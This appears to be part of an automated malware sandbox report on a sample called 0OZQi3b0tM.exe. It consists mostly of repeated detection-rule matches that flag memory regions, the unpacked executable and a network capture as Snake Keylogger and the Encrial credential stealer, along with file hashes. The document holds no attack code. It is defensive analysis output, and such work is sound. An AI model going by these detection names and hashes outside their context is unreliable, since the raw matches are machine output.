                Source: 00000000.00000002.737680246.0000000002990000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737438859.0000000002934000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737240182.00000000028CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738349545.0000000002ACD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738520206.0000000002AE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737615006.000000000297C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738206086.0000000002AA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737694580.0000000002998000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738046605.0000000002A75000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737534636.0000000002954000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738084741.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738331335.0000000002AC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737246038.00000000028CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737258885.00000000028D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737950672.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738536747.0000000002AED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737218317.00000000028BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737983761.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737998771.0000000002A65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737291941.00000000028EF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737504124.0000000002948000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737901412.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737883433.0000000002A35000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737944111.0000000002A4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738244012.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737409041.0000000002920000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738141181.0000000002A95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737889019.0000000002A39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737855627.00000000029FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737285680.00000000028EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000000.429980691.0000000000532000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738079094.0000000002A7D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738039601.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738059775.0000000002A79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738194827.0000000002AA5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737190839.00000000028A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737592635.0000000002970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738181191.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737144637.000000000288C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737978655.0000000002A5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737655258.0000000002988000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.735961437.0000000000532000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737628909.0000000002980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737833563.00000000029F4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737414593.0000000002924000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737929824.0000000002A45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737560330.0000000002960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737825477.00000000029F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738023885.0000000002A6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738485397.0000000002AE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737575208.0000000002968000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737808101.00000000029E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737431755.0000000002930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737466902.0000000002940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737280426.00000000028E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737670833.000000000298C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737689328.0000000002994000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737225304.00000000028C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737609149.0000000002978000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737936851.0000000002A49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737641884.0000000002984000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738147230.0000000002A99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738223259.0000000002AAD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738314614.0000000002AC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737450837.0000000002938000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737597795.0000000002974000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738125525.0000000002A8D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738160524.0000000002A9D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738425558.0000000002AD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738406461.0000000002AD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738262050.0000000002AB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737864301.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737968200.0000000002A55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737105124.0000000002867000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737263659.00000000028DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737253851.00000000028D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738109588.0000000002A89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737973247.0000000002A59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737457876.000000000293C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737523761.0000000002950000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737154483.0000000002890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737212904.00000000028BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737268236.00000000028DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737839802.00000000029F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738270244.0000000002AB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738131471.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737420491.0000000002928000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738395968.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738017194.0000000002A69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737513462.000000000294C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737567001.0000000002964000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000003.670353008.0000000002E38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.739661705.000000000671A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: Process Memory Space: 0OZQi3b0tM.exe PID: 7100, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 0OZQi3b0tM.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0OZQi3b0tM.exe, type: SAMPLEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 0OZQi3b0tM.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0OZQi3b0tM.exe, type: SAMPLEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: sslproxydump.pcap, type: PCAPMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 0.2.0OZQi3b0tM.exe.530000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 0.0.0OZQi3b0tM.exe.530000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 0.2.0OZQi3b0tM.exe.530000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.0.0OZQi3b0tM.exe.530000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.0.0OZQi3b0tM.exe.530000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 0.2.0OZQi3b0tM.exe.530000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738443207.0000000002ADD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737543287.0000000002958000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738278860.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737582921.000000000296C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738464278.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737477229.0000000002944000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737233949.00000000028C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737426073.000000000292C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737400500.000000000291C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737877910.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737872155.0000000002A2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738102517.0000000002A85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737894796.0000000002A3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737177065.0000000002898000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737163773.0000000002894000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738298999.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737551923.000000000295C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737275091.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737205564.00000000028B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737680246.0000000002990000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737438859.0000000002934000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737240182.00000000028CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738349545.0000000002ACD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738520206.0000000002AE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737615006.000000000297C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738206086.0000000002AA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737694580.0000000002998000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738046605.0000000002A75000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737534636.0000000002954000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738084741.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738331335.0000000002AC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737246038.00000000028CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737258885.00000000028D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737950672.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738536747.0000000002AED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737218317.00000000028BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737983761.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737998771.0000000002A65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737291941.00000000028EF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737504124.0000000002948000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737901412.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737883433.0000000002A35000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737944111.0000000002A4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738244012.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737409041.0000000002920000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
